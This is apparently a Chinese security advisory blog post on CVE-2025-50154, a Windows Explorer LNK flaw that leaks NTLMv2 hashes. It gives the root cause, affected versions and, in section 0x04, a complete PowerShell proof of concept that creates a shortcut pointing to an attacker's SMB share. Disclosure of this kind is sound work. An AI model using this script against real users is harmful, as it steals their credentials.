0x00 前言
Windows文件资源管理器是Windows操作系统的核心文件管理工具,用于浏览、整理文件和文件夹。它采用树形结构视图展示本地磁盘和网络资源,支持复制、移动、删除等操作。界面包含导航窗格、地址栏和功能区菜单,便于快速访问和预览。
0x01 漏洞描述
漏洞涉及Windows资源管理器处理LNK快捷方式文件时的安全问题。具体来说:
1. 漏洞根源在于资源管理器解析LNK文件图标时的缺陷
2. 微软之前修复了通过UNC路径加载图标的安全问题(CVE-2025-24054)
3. 但遗漏了另一种攻击方式:当LNK文件同时满足以下条件时仍会触发漏洞:
(1)图标路径指向本地系统文件(如shell32.dll)。
(2)可执行路径指向远程SMB共享中的程序文件。
4. 这种情况下,资源管理器会自动下载远程文件来提取其内嵌图标资源
5. 此过程会在用户无感知的情况下发起NTLM认证,导致NTLMv2-SSP哈希值泄露
0x02 CVE编号
CVE-2025-50154
0x03 影响版本
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
0x04 漏洞详情
POC:
https://github.com/rubenformation/CVE-2025-50154
<#
.SYNOPSIS
Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.
.DESCRIPTION
This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file.
The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to
fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
The shared folder on the SMB server where the binary is stored.
.PARAMETER file
The name of the binary file (e.g., payload.exe).
.EXAMPLE
.\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe"
#>
param(
[Parameter(Mandatory=$true)]
[string]$path, # -path
[Parameter(Mandatory=$true)]
[string]$ip, # -ip
[Parameter(Mandatory=$true)]
[string]$share, # -share
[Parameter(Mandatory=$true)]
[string]$file # -file
)
# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"
0x05 参考链接
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50154/
推荐阅读:
CVE-2025-48799|Windows Update 服务本地权限提升漏洞(POC)
【漏洞复现】CVE-2025-33073|Windows SMB 权限提升漏洞
CVE-2025-33073|Windows SMB权限提升漏洞
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持